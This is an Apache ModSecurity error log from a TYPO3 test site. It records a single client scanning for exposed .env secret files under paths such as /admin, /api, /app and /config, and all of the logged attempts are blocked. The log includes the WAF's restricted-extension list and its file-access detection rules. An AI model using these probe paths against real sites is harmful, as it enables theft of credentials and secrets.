[Fri Nov 21 10:12:51.343949 2025] [:error] [pid 223954] [client 15.223.224.122:44380] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aSAtE4PLQdWysfkg-aEKAAAAAAI"]
[Fri Nov 21 10:12:51.344117 2025] [:error] [pid 223954] [client 15.223.224.122:44380] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aSAtE4PLQdWysfkg-aEKAAAAAAI"]
[Fri Nov 21 10:12:51.344323 2025] [:error] [pid 223954] [client 15.223.224.122:44380] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aSAtE4PLQdWysfkg-aEKAAAAAAI"]
[Fri Nov 21 10:12:51.344477 2025] [:error] [pid 223954] [client 15.223.224.122:44380] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aSAtE4PLQdWysfkg-aEKAAAAAAI"]
[Fri Nov 21 10:12:51.364194 2025] [:error] [pid 224162] [client 15.223.224.122:44388] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSAtE0_9oHP6AInZ0COzKQAAAAo"]
[Fri Nov 21 10:12:51.364397 2025] [:error] [pid 224162] [client 15.223.224.122:44388] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSAtE0_9oHP6AInZ0COzKQAAAAo"]
[Fri Nov 21 10:12:51.364586 2025] [:error] [pid 224162] [client 15.223.224.122:44388] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSAtE0_9oHP6AInZ0COzKQAAAAo"]
[Fri Nov 21 10:12:51.487663 2025] [:error] [pid 224157] [client 15.223.224.122:44518] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.save"] [unique_id "aSAtExwVZ0k-ldSnL4rj_AAAAAY"]
[Fri Nov 21 10:12:51.487933 2025] [:error] [pid 224157] [client 15.223.224.122:44518] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.save"] [unique_id "aSAtExwVZ0k-ldSnL4rj_AAAAAY"]
[Fri Nov 21 10:12:51.488135 2025] [:error] [pid 224157] [client 15.223.224.122:44518] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.save"] [unique_id "aSAtExwVZ0k-ldSnL4rj_AAAAAY"]
[Fri Nov 21 10:12:51.842328 2025] [:error] [pid 224165] [client 15.223.224.122:44756] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSAtEyF2CK_vLyoVI-2ERAAAAA0"]
[Fri Nov 21 10:12:51.842587 2025] [:error] [pid 224165] [client 15.223.224.122:44756] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSAtEyF2CK_vLyoVI-2ERAAAAA0"]
[Fri Nov 21 10:12:51.842773 2025] [:error] [pid 224165] [client 15.223.224.122:44756] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSAtEyF2CK_vLyoVI-2ERAAAAA0"]
[Fri Nov 21 10:12:52.829939 2025] [:error] [pid 224164] [client 15.223.224.122:44852] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.save"] [unique_id "aSAtFHwkd7Eed7ZXqoT4ewAAAAw"]
[Fri Nov 21 10:12:52.831735 2025] [:error] [pid 224164] [client 15.223.224.122:44852] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.save"] [unique_id "aSAtFHwkd7Eed7ZXqoT4ewAAAAw"]
[Fri Nov 21 10:12:52.831950 2025] [:error] [pid 224164] [client 15.223.224.122:44852] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.save"] [unique_id "aSAtFHwkd7Eed7ZXqoT4ewAAAAw"]
[Fri Nov 21 10:12:56.126942 2025] [authz_core:error] [pid 223955] [client 15.223.224.122:46634] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Fri Nov 21 10:12:56.210559 2025] [authz_core:error] [pid 224163] [client 15.223.224.122:46640] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Fri Nov 21 10:12:56.213873 2025] [:error] [pid 224149] [client 15.223.224.122:46660] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aSAtGMsPY-oBfuAti3FYwgAAAAU"]
[Fri Nov 21 10:12:56.214038 2025] [:error] [pid 224149] [client 15.223.224.122:46660] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aSAtGMsPY-oBfuAti3FYwgAAAAU"]
[Fri Nov 21 10:12:56.214399 2025] [:error] [pid 224149] [client 15.223.224.122:46660] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aSAtGMsPY-oBfuAti3FYwgAAAAU"]
[Fri Nov 21 10:12:56.214571 2025] [:error] [pid 224149] [client 15.223.224.122:46660] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aSAtGMsPY-oBfuAti3FYwgAAAAU"]
[Fri Nov 21 10:12:56.228542 2025] [:error] [pid 223952] [client 15.223.224.122:46674] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSAtGJIgILTHWk6gdY_zVgAAAAA"]
[Fri Nov 21 10:12:56.228728 2025] [:error] [pid 223952] [client 15.223.224.122:46674] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSAtGJIgILTHWk6gdY_zVgAAAAA"]
[Fri Nov 21 10:12:56.228901 2025] [:error] [pid 223952] [client 15.223.224.122:46674] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSAtGJIgILTHWk6gdY_zVgAAAAA"]
[Fri Nov 21 10:12:56.312749 2025] [:error] [pid 223953] [client 15.223.224.122:46670] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.save"] [unique_id "aSAtGD27u3u2us0kkkbx_wAAAAE"]
[Fri Nov 21 10:12:56.312954 2025] [:error] [pid 223953] [client 15.223.224.122:46670] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.save"] [unique_id "aSAtGD27u3u2us0kkkbx_wAAAAE"]
[Fri Nov 21 10:12:56.313110 2025] [:error] [pid 223953] [client 15.223.224.122:46670] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.save"] [unique_id "aSAtGD27u3u2us0kkkbx_wAAAAE"]
[Fri Nov 21 10:12:56.445394 2025] [:error] [pid 223954] [client 15.223.224.122:46680] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.old"] [unique_id "aSAtGIPLQdWysfkg-aEKAQAAAAI"]
[Fri Nov 21 10:12:56.445561 2025] [:error] [pid 223954] [client 15.223.224.122:46680] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.old"] [unique_id "aSAtGIPLQdWysfkg-aEKAQAAAAI"]
[Fri Nov 21 10:12:56.445765 2025] [:error] [pid 223954] [client 15.223.224.122:46680] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.old"] [unique_id "aSAtGIPLQdWysfkg-aEKAQAAAAI"]
[Fri Nov 21 10:12:56.445941 2025] [:error] [pid 223954] [client 15.223.224.122:46680] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.old"] [unique_id "aSAtGIPLQdWysfkg-aEKAQAAAAI"]
[Fri Nov 21 10:12:56.820499 2025] [:error] [pid 224162] [client 15.223.224.122:47142] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSAtGE_9oHP6AInZ0COzKgAAAAo"]
[Fri Nov 21 10:12:56.820726 2025] [:error] [pid 224162] [client 15.223.224.122:47142] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSAtGE_9oHP6AInZ0COzKgAAAAo"]
[Fri Nov 21 10:12:56.820903 2025] [:error] [pid 224162] [client 15.223.224.122:47142] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSAtGE_9oHP6AInZ0COzKgAAAAo"]
[Fri Nov 21 10:12:56.883833 2025] [:error] [pid 224157] [client 15.223.224.122:47130] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.save"] [unique_id "aSAtGBwVZ0k-ldSnL4rj_QAAAAY"]
[Fri Nov 21 10:12:56.884065 2025] [:error] [pid 224157] [client 15.223.224.122:47130] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.save"] [unique_id "aSAtGBwVZ0k-ldSnL4rj_QAAAAY"]
[Fri Nov 21 10:12:56.884245 2025] [:error] [pid 224157] [client 15.223.224.122:47130] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.save"] [unique_id "aSAtGBwVZ0k-ldSnL4rj_QAAAAY"]
[Fri Nov 21 10:13:00.084319 2025] [authz_core:error] [pid 224164] [client 15.223.224.122:48782] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Fri Nov 21 10:13:00.108246 2025] [:error] [pid 223952] [client 15.223.224.122:48834] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.save"] [unique_id "aSAtHJIgILTHWk6gdY_zVwAAAAA"]
